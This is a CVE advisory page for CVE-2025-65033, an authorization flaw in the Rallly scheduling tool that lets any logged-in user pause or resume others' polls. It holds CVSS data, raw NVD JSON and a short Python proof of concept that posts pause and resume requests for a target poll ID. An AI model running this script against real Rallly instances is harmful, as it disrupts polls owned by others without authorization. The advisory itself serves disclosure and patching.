Security Vulnerability Report
CVE-2025-65033 CVSS 8.1 HIGH

CVE-2025-65033

Published: 2025-11-19 18:15:51
Last Modified: 2025-11-24 18:02:25

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the poll management feature allows any authenticated user to pause or resume any poll, regardless of ownership. The system only uses the public pollId to identify polls, and it does not verify whether the user performing the action is the poll owner. As a result, any user can disrupt polls created by others, leading to a loss of integrity and availability across the application. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-65033 PoC - Rallly Authorization Bypass
# Any authenticated user can pause/resume any poll

TARGET_URL = "https://your-rallly-instance.com"
POLL_ID = "target-poll-id-here"  # Public poll ID from share link
SESSION_TOKEN = "your-authenticated-session-token"

headers = {
    "Authorization": f"Bearer {SESSION_TOKEN}",
    "Content-Type": "application/json",
}

# Pause any poll (regardless of ownership)
pause_url = f"{TARGET_URL}/api/polls/{POLL_ID}/pause"
response = requests.post(pause_url, headers=headers)
print(f"Pause request status: {response.status_code}")
print(f"Response: {response.text}")

# Resume any poll (regardless of ownership)
resume_url = f"{TARGET_URL}/api/polls/{POLL_ID}/resume"
response = requests.post(resume_url, headers=headers)
print(f"Resume request status: {response.status_code}")
print(f"Response: {response.text}")

# Note: No ownership verification is performed on the server side
```

References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 - Release Notes
https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3 - Exploit, Vendor Advisory

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65033",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T18:15:51.107",
    "lastModified": "2025-11-24T18:02:25.047",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the poll management feature allows any authenticated user to pause or resume any poll, regardless of ownership. The system only uses the public pollId to identify polls, and it does not verify whether the user performing the action is the poll owner. As a result, any user can disrupt polls created by others, leading to a loss of integrity and availability across the application. This issue has been patched in version 4.5.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-285"},
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.5.4",
                "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4p93-v53r-vch3",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```